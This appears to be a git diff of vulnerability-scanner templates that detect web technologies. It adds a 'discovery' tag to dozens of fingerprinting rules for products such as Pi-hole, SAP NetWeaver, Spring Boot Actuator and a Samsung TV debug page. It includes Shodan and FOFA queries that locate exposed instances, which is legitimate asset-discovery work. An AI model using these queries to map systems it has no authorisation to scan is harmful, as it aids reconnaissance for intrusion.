php-fusion fofa-query: title="PHP-Fusion" - tags: php,tech,php-fusion + tags: php,tech,php-fusion,discovery http: - method: GET diff --git a/http/technologies/php-proxy-detect.yaml b/http/technologies/php-proxy-detect.yaml index 94a8bc207ff..c2d37f5e2b4 100644 --- a/http/technologies/php-proxy-detect.yaml +++ b/http/technologies/php-proxy-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: tech,php,proxy + tags: tech,php,proxy,discovery http: - method: GET diff --git a/http/technologies/phplist-detect.yaml b/http/technologies/phplist-detect.yaml index fdcc4104db0..bab4fa0ad96 100644 --- a/http/technologies/phplist-detect.yaml +++ b/http/technologies/phplist-detect.yaml @@ -16,7 +16,7 @@ info: vendor: phplist product: phplist shodan-query: html:"phplist" - tags: tech,phplist,detect + tags: tech,phplist,detect,discovery http: - method: GET diff --git a/http/technologies/phppgadmin-version.yaml b/http/technologies/phppgadmin-version.yaml index 49ac7924f89..e88ed57ea68 100644 --- a/http/technologies/phppgadmin-version.yaml +++ b/http/technologies/phppgadmin-version.yaml @@ -11,7 +11,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,phppgadmin + tags: tech,phppgadmin,discovery http: - method: GET diff --git a/http/technologies/pi-hole-detect.yaml b/http/technologies/pi-hole-detect.yaml index b6c2af5d3fa..a308b18570e 100644 --- a/http/technologies/pi-hole-detect.yaml +++ b/http/technologies/pi-hole-detect.yaml @@ -12,7 +12,7 @@ info: vendor: pi-hole product: pi-hole shodan-query: title:"Pi-hole" - tags: tech,pihole,detect + tags: tech,pihole,detect,discovery http: - method: GET diff --git a/http/technologies/piwigo-detect.yaml b/http/technologies/piwigo-detect.yaml index e2123eae75d..75cbfc6bca6 100644 --- a/http/technologies/piwigo-detect.yaml +++ b/http/technologies/piwigo-detect.yaml @@ -13,7 +13,7 @@ info: vendor: piwigo google-query: powered by piwigo shodan-query: http.favicon.hash:540706145 - tags: piwigo,tech + tags: piwigo,tech,discovery http: - method: GET diff --git a/http/technologies/plantumlserver-detect.yaml b/http/technologies/plantumlserver-detect.yaml index c867866043d..2a92789fd59 100644 --- a/http/technologies/plantumlserver-detect.yaml +++ b/http/technologies/plantumlserver-detect.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: app="PlantUMLServer" - tags: tech,uml,plantuml,detect + tags: tech,uml,plantuml,detect,discovery http: - method: GET diff --git a/http/technologies/plone-cms-detect.yaml b/http/technologies/plone-cms-detect.yaml index 5c86a05abf6..88dfe5b851e 100644 --- a/http/technologies/plone-cms-detect.yaml +++ b/http/technologies/plone-cms-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/plone/Products.CMFPlone metadata: max-request: 1 - tags: tech,plone,cms + tags: tech,plone,cms,discovery http: - method: GET diff --git a/http/technologies/pomerium-detect.yaml b/http/technologies/pomerium-detect.yaml index c072125918b..4b178479344 100644 --- a/http/technologies/pomerium-detect.yaml +++ b/http/technologies/pomerium-detect.yaml @@ -12,7 +12,7 @@ info: max-request: 1 verified: true shodan-query: html:"pomerium" - tags: pomerium,sso,detect,tech + tags: pomerium,sso,detect,tech,discovery http: - method: GET diff --git a/http/technologies/prestashop-detect.yaml b/http/technologies/prestashop-detect.yaml index 3efb47e35ee..1bc80e0c7b5 100644 --- a/http/technologies/prestashop-detect.yaml +++ b/http/technologies/prestashop-detect.yaml @@ -11,7 +11,7 @@ info: vendor: prestashop product: prestashop shodan-query: http.component:"PrestaShop" - tags: tech,cms,prestashop + tags: tech,cms,prestashop,discovery http: - method: GET diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml index 88a9357e406..e594e675a1f 100644 --- a/http/technologies/privatebin-detect.yaml +++ b/http/technologies/privatebin-detect.yaml @@ -21,7 +21,7 @@ info: fofa-query: - title="PrivateBin" - icon_hash="1358855492" - tags: tech,privatebin,detect + tags: tech,privatebin,detect,discovery http: - method: GET diff --git a/http/technologies/projectsend-detect.yaml b/http/technologies/projectsend-detect.yaml index 85e62bbca07..c22060f4441 100644 --- a/http/technologies/projectsend-detect.yaml +++ b/http/technologies/projectsend-detect.yaml @@ -18,7 +18,7 @@ info: google-query: intext:Provided by ProjectSend product: projectsend vendor: projectsend - tags: tech,projectsend,edb + tags: tech,projectsend,edb,discovery http: - method: GET diff --git a/http/technologies/prtg-detect.yaml b/http/technologies/prtg-detect.yaml index 244a1921661..084ea3d5a21 100644 --- a/http/technologies/prtg-detect.yaml +++ b/http/technologies/prtg-detect.yaml @@ -7,7 +7,7 @@ info: description: Monitor all the systems, devices, traffic, and applications in your IT infrastructure -- https://www.paessler.com/prtg metadata: max-request: 3 - tags: tech,prtg + tags: tech,prtg,discovery http: - method: GET diff --git a/http/technologies/puppet-node-manager-detect.yaml b/http/technologies/puppet-node-manager-detect.yaml index 719deefd61c..198d9498e0f 100644 --- a/http/technologies/puppet-node-manager-detect.yaml +++ b/http/technologies/puppet-node-manager-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: 'app="puppet-Node-Manager"' - tags: node,tech + tags: node,tech,discovery http: - method: GET diff --git a/http/technologies/puppetdb-detect.yaml b/http/technologies/puppetdb-detect.yaml index e471a111025..a216083ad3d 100644 --- a/http/technologies/puppetdb-detect.yaml +++ b/http/technologies/puppetdb-detect.yaml @@ -8,7 +8,7 @@ info: - https://puppet.com/docs/puppetdb/7/api/meta/v1/version.html#pdbmetav1version metadata: max-request: 1 - tags: puppet,tech,exposure + tags: puppet,tech,exposure,discovery http: - method: GET diff --git a/http/technologies/puppetserver-detect.yaml b/http/technologies/puppetserver-detect.yaml index 5e05d4c8def..76c0601b6a2 100644 --- a/http/technologies/puppetserver-detect.yaml +++ b/http/technologies/puppetserver-detect.yaml @@ -8,7 +8,7 @@ info: - https://insinuator.net/2020/09/puppet-assessment-techniques/ metadata: max-request: 1 - tags: tech,puppet,exposure,intrusive + tags: tech,puppet,exposure,intrusive,discovery http: - method: GET diff --git a/http/technologies/pypiserver-detect.yaml b/http/technologies/pypiserver-detect.yaml index 6d80f0232a0..53060b85081 100644 --- a/http/technologies/pypiserver-detect.yaml +++ b/http/technologies/pypiserver-detect.yaml @@ -12,7 +12,7 @@ info: vendor: python product: pypiserver shodan-query: html:"pypiserver" - tags: tech,pypiserver + tags: tech,pypiserver,discovery http: - method: GET diff --git a/http/technologies/redcap-detector.yaml b/http/technologies/redcap-detector.yaml index 327c396a80a..e8705470758 100644 --- a/http/technologies/redcap-detector.yaml +++ b/http/technologies/redcap-detector.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: redcap,tech + tags: redcap,tech,discovery http: - method: GET diff --git a/http/technologies/redmine-cli-detect.yaml b/http/technologies/redmine-cli-detect.yaml index 2c35b003c3b..22df0cd51e0 100644 --- a/http/technologies/redmine-cli-detect.yaml +++ b/http/technologies/redmine-cli-detect.yaml @@ -7,7 +7,7 @@ info: description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ metadata: max-request: 1 - tags: tech,redmine + tags: tech,redmine,discovery http: - method: GET diff --git a/http/technologies/rhymix-cms-detect.yaml b/http/technologies/rhymix-cms-detect.yaml index 1b8092c8d6a..65e936f0511 100644 --- a/http/technologies/rhymix-cms-detect.yaml +++ b/http/technologies/rhymix-cms-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/rhymix/rhymix metadata: max-request: 1 - tags: tech,rhymix + tags: tech,rhymix,discovery http: - method: GET diff --git a/http/technologies/roadiz-cms-detect.yaml b/http/technologies/roadiz-cms-detect.yaml index 70a196cef79..3b98094f3cf 100644 --- a/http/technologies/roadiz-cms-detect.yaml +++ b/http/technologies/roadiz-cms-detect.yaml @@ -16,7 +16,7 @@ info: product: roadiz shodan-query: http.html:"roadiz" fofa-query: body="roadiz" - tags: tech,cms,roadiz,detect + tags: tech,cms,roadiz,detect,discovery http: - method: GET diff --git a/http/technologies/rosariosis-detect.yaml b/http/technologies/rosariosis-detect.yaml index e760fa6cdbe..b53f8fa481e 100644 --- a/http/technologies/rosariosis-detect.yaml +++ b/http/technologies/rosariosis-detect.yaml @@ -9,7 +9,7 @@ info: - https://www.rosariosis.org/ metadata: max-request: 1 - tags: tech,rosariosis + tags: tech,rosariosis,discovery http: - method: GET diff --git a/http/technologies/roundcube-webmail-portal.yaml b/http/technologies/roundcube-webmail-portal.yaml index 3ead6d4cf8e..014cedc7923 100644 --- a/http/technologies/roundcube-webmail-portal.yaml +++ b/http/technologies/roundcube-webmail-portal.yaml @@ -11,7 +11,7 @@ info: vendor: roundcube product: webmail shodan-query: http.component:"RoundCube" - tags: roundcube,portal,tech + tags: roundcube,portal,tech,discovery http: - method: GET diff --git a/http/technologies/rseenet-detect.yaml b/http/technologies/rseenet-detect.yaml index 5f8d90b3d58..105668293b4 100644 --- a/http/technologies/rseenet-detect.yaml +++ b/http/technologies/rseenet-detect.yaml @@ -13,7 +13,7 @@ info: shodan-query: http.title:"R-SeeNet" product: r-seenet vendor: advantech - tags: tech,rseenet + tags: tech,rseenet,discovery http: - method: GET diff --git a/http/technologies/rsshub-detect.yaml b/http/technologies/rsshub-detect.yaml index b60522c552b..2d756049ace 100644 --- a/http/technologies/rsshub-detect.yaml +++ b/http/technologies/rsshub-detect.yaml @@ -12,7 +12,7 @@ info: vendor: rsshub product: rsshub shodan-query: http.favicon.hash:-1893514038 - tags: tech,rsshub + tags: tech,rsshub,discovery http: - method: GET diff --git a/http/technologies/s3-detect.yaml b/http/technologies/s3-detect.yaml index 549bc0d6189..3e3aca8c37e 100644 --- a/http/technologies/s3-detect.yaml +++ b/http/technologies/s3-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: aws,s3,bucket,tech + tags: aws,s3,bucket,tech,discovery http: - method: GET diff --git a/http/technologies/salesforce-b2c-commerce-webdav.yaml b/http/technologies/salesforce-b2c-commerce-webdav.yaml index eee43cbc7ad..aadaf5bd082 100644 --- a/http/technologies/salesforce-b2c-commerce-webdav.yaml +++ b/http/technologies/salesforce-b2c-commerce-webdav.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"/waroot/style.css" - tags: salesforce,tech,detect + tags: salesforce,tech,detect,discovery http: - method: GET diff --git a/http/technologies/samsung-smarttv-debug.yaml b/http/technologies/samsung-smarttv-debug.yaml index 7230bf67916..016232afeac 100644 --- a/http/technologies/samsung-smarttv-debug.yaml +++ b/http/technologies/samsung-smarttv-debug.yaml @@ -12,7 +12,7 @@ info: vendor: samsung product: nt14u_firmware shodan-query: title:"Debug Config" - tags: samsung,tech,iot + tags: samsung,tech,iot,discovery http: - method: GET diff --git a/http/technologies/sap-spartacus-detect.yaml b/http/technologies/sap-spartacus-detect.yaml index 601135fcdbf..e5333c2d7e1 100644 --- a/http/technologies/sap-spartacus-detect.yaml +++ b/http/technologies/sap-spartacus-detect.yaml @@ -10,7 +10,7 @@ info: metadata: verified: true max-request: 1 - tags: tech,sap,hybris,angular,spartacus + tags: tech,sap,hybris,angular,spartacus,discovery http: - method: GET diff --git a/http/technologies/sap/sap-igs-detect.yaml b/http/technologies/sap/sap-igs-detect.yaml index 177d40a3885..5ec742eda40 100644 --- a/http/technologies/sap/sap-igs-detect.yaml +++ b/http/technologies/sap/sap-igs-detect.yaml @@ -7,7 +7,7 @@ info: description: Detection of SAP Internet Graphics Server (IGS) metadata: max-request: 1 - tags: sap,tech,igs + tags: sap,tech,igs,discovery http: - method: GET diff --git a/http/technologies/sap/sap-netweaver-detect.yaml b/http/technologies/sap/sap-netweaver-detect.yaml index 1ead70035e1..3727519188a 100644 --- a/http/technologies/sap/sap-netweaver-detect.yaml +++ b/http/technologies/sap/sap-netweaver-detect.yaml @@ -15,7 +15,7 @@ info: - icon_hash=-266008933 product: content_server vendor: sap - tags: sap,webserver,tech,detect + tags: sap,webserver,tech,detect,discovery http: - method: GET diff --git a/http/technologies/sap/sap-netweaver-webgui.yaml b/http/technologies/sap/sap-netweaver-webgui.yaml index 7999053937b..84a5347c5bf 100644 --- a/http/technologies/sap/sap-netweaver-webgui.yaml +++ b/http/technologies/sap/sap-netweaver-webgui.yaml @@ -7,7 +7,7 @@ info: description: Detection of SAP NetWeaver ABAP Webserver WebGUI metadata: max-request: 1 - tags: sap,webserver,tech + tags: sap,webserver,tech,discovery http: - method: GET diff --git a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml index 29df76b95cf..193862b9a8f 100644 --- a/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml +++ b/http/technologies/sap/sap-web-dispatcher-admin-portal.yaml @@ -11,7 +11,7 @@ info: product: content_server vendor: sap fofa-query: icon_hash=-266008933 - tags: sap,webserver,proxy,tech + tags: sap,webserver,proxy,tech,discovery http: - method: GET diff --git a/http/technologies/sap/sap-web-dispatcher.yaml b/http/technologies/sap/sap-web-dispatcher.yaml index 22e210952ea..19f4ba60296 100644 --- a/http/technologies/sap/sap-web-dispatcher.yaml +++ b/http/technologies/sap/sap-web-dispatcher.yaml @@ -7,7 +7,7 @@ info: description: Detection of SAP Web Dispatcher service metadata: max-request: 1 - tags: sap,webserver,proxy,tech + tags: sap,webserver,proxy,tech,discovery http: - method: GET diff --git a/http/technologies/sceditor-detect.yaml b/http/technologies/sceditor-detect.yaml index 1c08527c208..56d6387453a 100644 --- a/http/technologies/sceditor-detect.yaml +++ b/http/technologies/sceditor-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,sceditor + tags: tech,sceditor,discovery http: - method: GET diff --git a/http/technologies/searxng-detect.yaml b/http/technologies/searxng-detect.yaml index 1035933e3f1..576b1e2d010 100644 --- a/http/technologies/searxng-detect.yaml +++ b/http/technologies/searxng-detect.yaml @@ -1,32 +1,32 @@ -id: searxng-detect - -info: - name: SearXNG - Detect - author: rxerium - severity: info - description: | - A SearXNG search engine was detected. - reference: - - https://github.com/searxng/searxng - metadata: - max-request: 1 - verified: true - shodan-query: http.title:SearXNG - tags: searxng,search-engine,tech - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "<title>SearXNG" - - - type: status - status: +id: searxng-detect + +info: + name: SearXNG - Detect + author: rxerium + severity: info + description: | + A SearXNG search engine was detected. + reference: + - https://github.com/searxng/searxng + metadata: + max-request: 1 + verified: true + shodan-query: http.title:SearXNG + tags: searxng,search-engine,tech,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "SearXNG" + + - type: status + status: - 200 # digest: 490a004630440220076d7c8ea467a296d54df69ce9ca4e76d41a4370f4b91e8a991eb1d60fe11f07022064da6447155ce9492a8d88a650c6c1bd17020b0181f8d5032940599da5ec677e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/secui-waf-detect.yaml b/http/technologies/secui-waf-detect.yaml index 52200018af7..26743e44803 100644 --- a/http/technologies/secui-waf-detect.yaml +++ b/http/technologies/secui-waf-detect.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:-1101206929 - tags: tech,panel,secui + tags: tech,panel,secui,discovery http: - method: GET diff --git a/http/technologies/sekolahku-cms-detect.yaml b/http/technologies/sekolahku-cms-detect.yaml index 39aee522c62..880e04d56a4 100644 --- a/http/technologies/sekolahku-cms-detect.yaml +++ b/http/technologies/sekolahku-cms-detect.yaml @@ -1,28 +1,28 @@ -id: sekolahku-cms-detect - -info: - name: Sekolahku CMS - Detect - author: nblirwn - severity: info - description: | - Sekolahku CMS is a free, open-source, and easy-to-use content management system (CMS) for schools and educational institutions. It is designed to help schools manage their websites, manage student information, and manage school activities. - reference: - - https://sekolahku.web.id/ - metadata: - max-request: 1 - shodan-query: html:"sekolahku.web" - tags: tech,sekolahku,cms - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: body - words: - - 'sekolahku.web.id' - - 'CMS Sekolahku' +id: sekolahku-cms-detect + +info: + name: Sekolahku CMS - Detect + author: nblirwn + severity: info + description: | + Sekolahku CMS is a free, open-source, and easy-to-use content management system (CMS) for schools and educational institutions. It is designed to help schools manage their websites, manage student information, and manage school activities. + reference: + - https://sekolahku.web.id/ + metadata: + max-request: 1 + shodan-query: html:"sekolahku.web" + tags: tech,sekolahku,cms,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'sekolahku.web.id' + - 'CMS Sekolahku' condition: or # digest: 490a0046304402200eadb44e855789fde34291c68f2108a2fab70695e90257eb9ddb0f3866422d5b02205b9bc15948cc7ec47f2ea153d578a440989ad4b433da989ca680b5c743a8feaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml index 34fa4a2805f..0bafc338c19 100644 --- a/http/technologies/sharefile-storage-server.yaml +++ b/http/technologies/sharefile-storage-server.yaml @@ -12,7 +12,7 @@ info: vendor: citrix product: sharefile_storage_zones_controller shodan-query: title:"ShareFile Storage Server" - tags: tech,citrix,sharefile + tags: tech,citrix,sharefile,discovery http: - method: GET diff --git a/http/technologies/shibboleth-detect.yaml b/http/technologies/shibboleth-detect.yaml index 6d62a6d2649..462bd4467ab 100644 --- a/http/technologies/shibboleth-detect.yaml +++ b/http/technologies/shibboleth-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Shibboleth IdP" - tags: shibboleth,sso,detect,tech + tags: shibboleth,sso,detect,tech,discovery http: - method: GET diff --git a/http/technologies/shiro-detect.yaml b/http/technologies/shiro-detect.yaml index f177a69ae9f..e00fe686c20 100644 --- a/http/technologies/shiro-detect.yaml +++ b/http/technologies/shiro-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 1 - tags: tech,shiro + tags: tech,shiro,discovery http: - method: GET diff --git a/http/technologies/shopizer-detect.yaml b/http/technologies/shopizer-detect.yaml index 080b0f1158b..73751280812 100644 --- a/http/technologies/shopizer-detect.yaml +++ b/http/technologies/shopizer-detect.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: tech,shopizer + tags: tech,shopizer,discovery http: - method: GET diff --git a/http/technologies/shopware-detect.yaml b/http/technologies/shopware-detect.yaml index cfb87cc14b3..0b5467f4a25 100644 --- a/http/technologies/shopware-detect.yaml +++ b/http/technologies/shopware-detect.yaml @@ -16,7 +16,7 @@ info: vendor: shopware product: shopware shodan-query: title:"shopware AG" - tags: tech,shopware,cms + tags: tech,shopware,cms,discovery http: - method: GET diff --git a/http/technologies/silverback-detect.yaml b/http/technologies/silverback-detect.yaml index 7019ad5f611..826b9ab1d1c 100644 --- a/http/technologies/silverback-detect.yaml +++ b/http/technologies/silverback-detect.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:635899646 - tags: favicon,tech,silverback,mdm + tags: favicon,tech,silverback,mdm,discovery http: - method: GET diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml index d5d265dd579..1936963ac06 100644 --- a/http/technologies/simplesamlphp-detect.yaml +++ b/http/technologies/simplesamlphp-detect.yaml @@ -16,7 +16,7 @@ info: vendor: simplesamlphp product: simplesamlphp shodan-query: "http.title:\"SimpleSAMLphp installation page\"" - tags: tech,simplesamlphp,detect + tags: tech,simplesamlphp,detect,discovery http: - method: GET diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml index fcdb132275c..b4348924ccc 100644 --- a/http/technologies/sitecore-cms.yaml +++ b/http/technologies/sitecore-cms.yaml @@ -16,7 +16,7 @@ info: vendor: sitecore product: cms shodan-query: title:"sitecore" - tags: cms,sitecore,tech + tags: cms,sitecore,tech,discovery http: - method: GET diff --git a/http/technologies/sitecore-version.yaml b/http/technologies/sitecore-version.yaml index f3bf641bb2b..195449f1acb 100644 --- a/http/technologies/sitecore-version.yaml +++ b/http/technologies/sitecore-version.yaml @@ -8,7 +8,7 @@ info: - https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html metadata: max-request: 1 - tags: sitecore,tech + tags: sitecore,tech,discovery http: - method: GET diff --git a/http/technologies/slims-cms-detect.yaml b/http/technologies/slims-cms-detect.yaml index 884f4016dd5..3c129294d27 100644 --- a/http/technologies/slims-cms-detect.yaml +++ b/http/technologies/slims-cms-detect.yaml @@ -1,26 +1,26 @@ -id: slims-cms-detect - -info: - name: Slims CMS - Detect - author: nblirwn - severity: info - description: Detects Senayan Library Management System (SLiMS) CMS - reference: - - https://github.com/slims - metadata: - verified: true - max-request: 1 - shodan-query: html:'content="SLiMS' - tags: tech,slims,cms,senayan - -http: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - part: body - words: +id: slims-cms-detect + +info: + name: Slims CMS - Detect + author: nblirwn + severity: info + description: Detects Senayan Library Management System (SLiMS) CMS + reference: + - https://github.com/slims + metadata: + verified: true + max-request: 1 + shodan-query: html:'content="SLiMS' + tags: tech,slims,cms,senayan,discovery + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: - 'content="SLiMS' # digest: 4a0a00473045022100e67f83cfc1e471442767ed2c4f9c76cb846fba7e33d44967c70a3549ff18b5d9022005e4efcf646aceeedf40e35770a6bb909bb512e4334493de98c7142be584b8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/smartstore-detect.yaml b/http/technologies/smartstore-detect.yaml index b10f99f53c8..12e24ee2e03 100644 --- a/http/technologies/smartstore-detect.yaml +++ b/http/technologies/smartstore-detect.yaml @@ -13,7 +13,7 @@ info: vendor: smartstore product: smartstore shodan-query: http.html:'content="Smartstore' - tags: tech,smartstore,oss + tags: tech,smartstore,oss,discovery http: - method: GET diff --git a/http/technologies/smtp2go-detect.yaml b/http/technologies/smtp2go-detect.yaml index a8c26d720dc..ebfba5fb4de 100644 --- a/http/technologies/smtp2go-detect.yaml +++ b/http/technologies/smtp2go-detect.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"smtp2go" - tags: tech,smtp2go + tags: tech,smtp2go,discovery http: - method: GET diff --git a/http/technologies/snipeit-panel.yaml b/http/technologies/snipeit-panel.yaml index 583437c8238..f7800720c32 100644 --- a/http/technologies/snipeit-panel.yaml +++ b/http/technologies/snipeit-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:431627549 product: snipe-it vendor: snipeitapp - tags: panel,snipeit,tech + tags: panel,snipeit,tech,discovery http: - method: GET diff --git a/http/technologies/sogo-detect.yaml b/http/technologies/sogo-detect.yaml index f60e7a5197d..bf9da3fb47c 100644 --- a/http/technologies/sogo-detect.yaml +++ b/http/technologies/sogo-detect.yaml @@ -15,7 +15,7 @@ info: vendor: alinto product: sogo shodan-query: http.title:"SOGo" - tags: sogo,tech + tags: sogo,tech,discovery http: - method: GET diff --git a/http/technologies/sonicwall-email-security-detect.yaml b/http/technologies/sonicwall-email-security-detect.yaml index a373c7c497d..09139f6bdb1 100644 --- a/http/technologies/sonicwall-email-security-detect.yaml +++ b/http/technologies/sonicwall-email-security-detect.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: tech,panel,sonicwall + tags: tech,panel,sonicwall,discovery http: - method: GET diff --git a/http/technologies/sparklighter-detect.yaml b/http/technologies/sparklighter-detect.yaml index 2d01ddcead5..aed06b7a03c 100644 --- a/http/technologies/sparklighter-detect.yaml +++ b/http/technologies/sparklighter-detect.yaml @@ -21,7 +21,7 @@ info: - title="spark master at" - body="/apps/imt/html/" google-query: intitle:"spark master at" - tags: tech,lighter,spark,detect,apache + tags: tech,lighter,spark,detect,apache,discovery http: - method: GET diff --git a/http/technologies/spinnaker-detect.yaml b/http/technologies/spinnaker-detect.yaml index bf375b836f8..d8e44639ff3 100644 --- a/http/technologies/spinnaker-detect.yaml +++ b/http/technologies/spinnaker-detect.yaml @@ -7,7 +7,7 @@ info: description: Detects the Spinnaker continuous delivery software metadata: max-request: 1 - tags: tech,spinnaker + tags: tech,spinnaker,discovery http: - method: GET diff --git a/http/technologies/spip-detect.yaml b/http/technologies/spip-detect.yaml index a1c84759f09..844d86190a5 100644 --- a/http/technologies/spip-detect.yaml +++ b/http/technologies/spip-detect.yaml @@ -13,7 +13,7 @@ info: vendor: spip product: spip fofa-query: app="SPIP" - tags: spip,tech,detect + tags: spip,tech,detect,discovery http: - method: GET diff --git a/http/technologies/splash-rendering-service.yaml b/http/technologies/splash-rendering-service.yaml index dd0ac82486a..ece5aeace1d 100644 --- a/http/technologies/splash-rendering-service.yaml +++ b/http/technologies/splash-rendering-service.yaml @@ -16,7 +16,7 @@ info: max-request: 1 shodan-query: title:"Splash" hunter-query: web.title="Splash" && header="TwistedWeb" - tags: tech,splash,detect + tags: tech,splash,detect,discovery http: - method: GET diff --git a/http/technologies/splunkhec-detect.yaml b/http/technologies/splunkhec-detect.yaml index e2bda636d3f..9a6fc3581bf 100644 --- a/http/technologies/splunkhec-detect.yaml +++ b/http/technologies/splunkhec-detect.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 1 - tags: tech,splunk,hec,detect + tags: tech,splunk,hec,detect,discovery http: - method: GET diff --git a/http/technologies/spring-detect.yaml b/http/technologies/spring-detect.yaml index b3c2a631c83..c9b4a07fa76 100644 --- a/http/technologies/spring-detect.yaml +++ b/http/technologies/spring-detect.yaml @@ -8,7 +8,7 @@ info: - https://mkyong.com/spring-boot/spring-rest-error-handling-example/ metadata: max-request: 1 - tags: tech,java,spring + tags: tech,java,spring,discovery http: - method: GET diff --git a/http/technologies/springboot-actuator.yaml b/http/technologies/springboot-actuator.yaml index d906cfe0fbf..2fffb5ccf01 100644 --- a/http/technologies/springboot-actuator.yaml +++ b/http/technologies/springboot-actuator.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 4 shodan-query: http.favicon.hash:116323821 - tags: tech,springboot,actuator + tags: tech,springboot,actuator,discovery http: - method: GET diff --git a/http/technologies/springboot-whitelabel.yaml b/http/technologies/springboot-whitelabel.yaml index 1c68da30c36..e4fb6c36347 100644 --- a/http/technologies/springboot-whitelabel.yaml +++ b/http/technologies/springboot-whitelabel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Whitelabel Error Page" - tags: tech,spring,springboot,errorpage + tags: tech,spring,springboot,errorpage,discovery http: - raw: diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml index 8afdcc87ef1..c5ec2a35b08 100644 --- a/http/technologies/statamic-detect.yaml +++ b/http/technologies/statamic-detect.yaml @@ -16,7 +16,7 @@ info: vendor: statamic product: statamic shodan-query: "Statamic" - tags: tech,statamic,detect + tags: tech,statamic,detect,discovery http: - method: GET diff --git a/http/technologies/stirling-pdf-detect.yaml b/http/technologies/stirling-pdf-detect.yaml index 9adfca27c12..7a9af98ceea 100644 --- a/http/technologies/stirling-pdf-detect.yaml +++ b/http/technologies/stirling-pdf-detect.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="245183385" - tags: tech,stirling-pdf + tags: tech,stirling-pdf,discovery http: - method: GET diff --git a/http/technologies/strapi-cms-detect.yaml b/http/technologies/strapi-cms-detect.yaml index 7624028bb0c..68dd2e255e6 100644 --- a/http/technologies/strapi-cms-detect.yaml +++ b/http/technologies/strapi-cms-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/strapi/strapi metadata: max-request: 1 - tags: tech,strapi,cms + tags: tech,strapi,cms,discovery http: - method: GET diff --git a/http/technologies/streamlit-detect.yaml b/http/technologies/streamlit-detect.yaml index 5ebc3f023de..52e2e0b3791 100644 --- a/http/technologies/streamlit-detect.yaml +++ b/http/technologies/streamlit-detect.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 fofa-query: icon_hash="1080665471" - tags: tech,streamlit,detect + tags: tech,streamlit,detect,discovery http: - method: GET diff --git a/http/technologies/subrion-cms-detect.yaml b/http/technologies/subrion-cms-detect.yaml index d65b62cbee2..5524335f1fb 100644 --- a/http/technologies/subrion-cms-detect.yaml +++ b/http/technologies/subrion-cms-detect.yaml @@ -12,7 +12,7 @@ info: product: subrion shodan-query: http.component:"Subrion" fofa-query: title="subrion" - tags: subrion,tech + tags: subrion,tech,discovery http: - method: GET diff --git a/http/technologies/sucuri-firewall.yaml b/http/technologies/sucuri-firewall.yaml index 8b96b8f1eae..f6c87c391a9 100644 --- a/http/technologies/sucuri-firewall.yaml +++ b/http/technologies/sucuri-firewall.yaml @@ -8,7 +8,7 @@ info: max-request: 1 shodan-query: http.html:"sucuri firewall" fofa-query: "sucuri firewall" - tags: tech,sucuri,firewall + tags: tech,sucuri,firewall,discovery http: - method: GET diff --git a/http/technologies/swag-instance-default-page.yaml b/http/technologies/swag-instance-default-page.yaml index 04ea3f1db76..a29952f2708 100644 --- a/http/technologies/swag-instance-default-page.yaml +++ b/http/technologies/swag-instance-default-page.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: title:"Welcome to your SWAG instance" - tags: panel,tech + tags: panel,tech,discovery http: - method: GET diff --git a/http/technologies/switch-protocol.yaml b/http/technologies/switch-protocol.yaml index 2431cc0211c..c43508d5407 100644 --- a/http/technologies/switch-protocol.yaml +++ b/http/technologies/switch-protocol.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: '"connection: upgrade"' - tags: protocol,switching,tech,websocket,h2c + tags: protocol,switching,tech,websocket,h2c,discovery http: - method: GET 